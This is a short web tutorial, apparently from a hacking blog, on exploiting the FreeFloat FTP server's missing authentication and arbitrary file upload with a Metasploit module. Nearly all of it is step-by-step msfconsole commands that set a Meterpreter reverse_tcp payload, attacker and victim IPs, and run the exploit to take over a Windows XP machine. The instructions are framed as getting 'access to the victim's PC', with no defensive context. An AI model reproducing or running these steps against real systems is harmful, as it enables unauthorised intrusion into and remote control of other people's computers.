Exploit Windows PC in Network using FreeFloat FTP Server Arbitrary File Upload

This Metasploit module abuses multiple issues in FreeFloat: 1. No credential is actually needed to login; 2. User’s default path is in C:, and this cannot be changed; 3. User can write to anywhere on the server’s file system. As a result of these poor implementations, a malicious user can just log in and then upload files, and let WMI (Management Instrumentation service) to execute the payload uploaded.

Exploit Targets

FreeFloat

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/ftp/freefloatftp_webm

msf exploit (freefloatftp_webm)>set payload windows/meterpreter/reverse_tcp

msf exploit (freefloatftp_webm)>set lhost 192.168.0.109 (IP of Local Host)

msf exploit (freefloatftp_webm)>set rhost 192.168.0.108 (Address of remote machine)

msf exploit (freefloatftp_webm)>exploit

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

For More Meterpreter Commands Click Here

Leave a Reply

Your email address will not be published. Required fields are marked *